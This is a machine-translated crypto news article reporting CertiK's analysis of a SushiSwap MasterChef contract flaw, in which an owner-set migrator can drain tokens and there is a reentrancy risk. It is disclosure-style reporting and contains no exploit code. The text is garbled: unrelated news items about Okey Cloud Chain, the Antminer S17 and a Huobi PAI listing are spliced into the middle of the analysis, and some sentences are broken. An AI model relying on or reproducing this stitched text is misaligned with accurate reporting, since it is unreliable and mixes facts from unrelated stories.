First release | Sushiswap smart contract security vulnerability event analysis

On August 28th, Beijing time, the CertiK security research team discovered that there were multiple security vulnerabilities in the smart contract of the sushiswap project. Any operation including operations such as taking empty in the case. At the same time, the smart contract of the project also has a serious reentrancy attack vulnerability, which will cause the malicious code of the potential attacker to be executed multiple times.

Technical steps:

First release | Okey Cloud Chain launched the "Sky Eye Solution" to promote the further upgrade of the security system on the chain: On August 28, the blockchain industry group Okey Cloud Chain announced the launch of the blockchain "Sky Eye Solution", mainly through the on-chain data tracking system Research and development, external technical support, and gathering the strength of enterprises will comprehensively help the security improvement of the blockchain and the stable and healthy development of the industry.

It is understood that under the "Sky Eye Program", the Okey Cloud Chain Group will build an on-chain data tracking system, and use methods such as tracing digital assets and monitoring illegal transactions to fully curb illegal activities such as money laundering; assist law enforcement agencies in handling cases, and create legal Provide technical support for such blockchain systems; provide blockchain + big data solutions for alliance chains and on-chain data based on various businesses. [2020/8/28]

MasterChief.sol:131 https://github.com/sushiswap/sushiswap/blob/master/contracts/MasterChef.sol

First release | Antminer S17 real machine map for the first time exposed with dual-tube fan and all-in-one design: Following the official announcement of spot sales on April 9, Bitmain’s upcoming new Antminer S17 has new developments. It is reported that the real machine map of the Antminer S17 was first exposed on the Internet today.

Judging from the exposed pictures, the Antminer S17 continues the double-barrel fan design of the previous generation product S15, and adopts the body design of an all-in-one machine. Some people in the industry believe that the double-barrel design can effectively shorten the wind range, the temperature difference between the inlet and outlet of the mining machine will be smaller, and the performance of the machine will be greatly improved.

Previously, the person in charge of Bitmain’s product said in an interview with the media that compared with the previous generation of products, the new product S17 has greatly improved in terms of energy efficiency ratio and computing power per unit volume. [2019/4/3]

In line 131 of the MasterChief.sol smart contract of the sushiswap project smart contract, the owner of the smart contract can have the authority to set the value of the migrator variable in the above figure, and the setting of the value can determine which migrator contract code to set Carry out the following operation.

Announcement | Huobi Global World Premiere of Project PAI at 16:00 on June 29: Huobi Global will launch Project PAI (PAI) deposit service at 16:00 on June 29, Singapore time. At 16:00 on July 2, PAI/BTC, PAI/ETH transactions will be opened in the Innovation Zone. PAI withdrawal service will be opened at 16:00 on July 6. [2018/6/29]

MasterChief.sol: 136 https://github.com/sushiswap/sushiswap/blob/master/contracts/MasterChef.sol

When the value of migrator is determined, the code in line 142 in the above figure, migrator.migrate(lpToken) is also determined accordingly, and the method of migrate is called through the interface of IMigratorChef, so when calling, migrate The logic code in the method will change according to the migrator value.

In short, if the smart contract owner points the value of migrator to a smart contract containing malicious migrate method code, then the owner can perform any malicious operations he wants, and may even empty all the tokens in the account .

At the same time, after executing the migrator.migrate(lpToken) line of code in line 142 in the above figure, the smart contract owner can also use the reentrancy attack vulnerability to re-execute the migrate method starting from line 136 or other smart contract methods to perform Malicious operation.  

The creator of the current sushiswap project stated that the project has been added to the display of the timelock (timelock) contract, that is, the operation of any sushiswap project smart contract owner will have a 48-hour delay lock.

Revelation of this vulnerability:

Smart contract owners should not have unlimited rights, and community governance must be used to limit smart contract owners and ensure that they will not use their own advantages to conduct malicious operations;

The smart contract code needs to undergo strict security verification and inspection before it can be released.

Tags：

Ethereum Price